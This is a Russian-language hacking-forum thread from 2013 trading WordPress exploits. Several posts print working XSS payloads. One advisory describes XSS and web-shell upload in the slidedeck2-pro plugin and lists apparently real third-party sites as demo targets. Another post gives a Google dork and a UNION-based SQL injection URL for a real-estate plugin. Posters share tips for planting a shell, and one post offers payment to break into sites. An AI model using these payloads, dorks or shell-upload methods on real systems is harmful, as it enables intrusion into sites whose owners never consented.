HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #271  
Старый 03.01.2013, 18:41
bredbaraded
Guest
Сообщений: n/a
Провел на форуме:
3501

Репутация: 0
По умолчанию

Цитата:
Сообщение от MaxFast  
MaxFast said:
Wordpress 3.5 Active XSS



Нужны права администратора.

Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:
Код:
Code:
">alert('XSS Test')

Проверить можно тут.
Код:
Code:
L: test
P: test
(c) MaxFast aka n3m1s
C правами админа и iframe можно вставить.
 
Ответить с цитированием

  #272  
Старый 12.01.2013, 22:15
pharm_all
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737

Репутация: 1
По умолчанию

Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.


+# This affects W3 Total Cache
 
Ответить с цитированием

  #273  
Старый 21.02.2013, 22:21
3ak.aT
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability

Код HTML:
HTML:
# Author => Zikou-16
# Download plugin : http://wordpress.org/extend/plugins/slidedeck2/

#=> Exploit Info :
------------------
# The attacker can inject HTML codes & inject a simple file uploader to upload shell
------------------

------------------
#=> XSS
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

inj3ct u'r HTML codes in (Text) then click Copy To Clipboard... 

screenshot #=> http://i49.tinypic.com/1zgqngx.png

------------------
#=> Shell Upload
------------------

http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

inj3ct u'r simple file uploader & upload u'r shell

screenshot #=> http://i45.tinypic.com/1426mhg.jpg

------------------
#=> Demos 
------------------

http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак.

Вопрос: какие идеи?

© Источник
 
Ответить с цитированием

  #274  
Старый 27.03.2013, 21:23
Limbaro
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

wordpress

Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську...

icq: 640831391
 
Ответить с цитированием

  #275  
Старый 25.04.2013, 02:12
Mastahh
Guest
Сообщений: n/a
Провел на форуме:
252

Репутация: 0
По умолчанию

Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?

Есть папка uploads, где видно все файлы. Значит где то есть uploader?
 
Ответить с цитированием

  #276  
Старый 09.05.2013, 18:53
strelok20094
Guest
Сообщений: n/a
Провел на форуме:
24770

Репутация: 2
По умолчанию

Цитата:
Сообщение от Mastahh  
Mastahh said:
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
Просканируй сайт этой прогой Web Vulnerability Scanner 8

там будет папка wp-content/plugins Так вот в ней и лежал плагины
 
Ответить с цитированием

  #277  
Старый 31.05.2013, 14:27
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Версия 3.5 и 3.5.1

Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода:

Код:
Code:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ">'>alert(String.fromCharCode(88,83,83))
после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.
 
Ответить с цитированием

  #278  
Старый 02.06.2013, 00:44
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь?

EDIT

Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)
 
Ответить с цитированием

  #279  
Старый 27.06.2013, 14:12
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию

WordPress marker_listings.xml SQL injection

Google dork:

Код:
Code:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
Vulnerable script:

Код:
Code:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
 
Ответить с цитированием

  #280  
Старый 27.08.2013, 22:42
J_thief
Guest
Сообщений: n/a
Провел на форуме:
6296

Репутация: 0
По умолчанию

Ребят, как эксплуатировать эту уязвимость, WordPress WP-Print Plugin CSRF

Сам плагин, версии 2.31
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ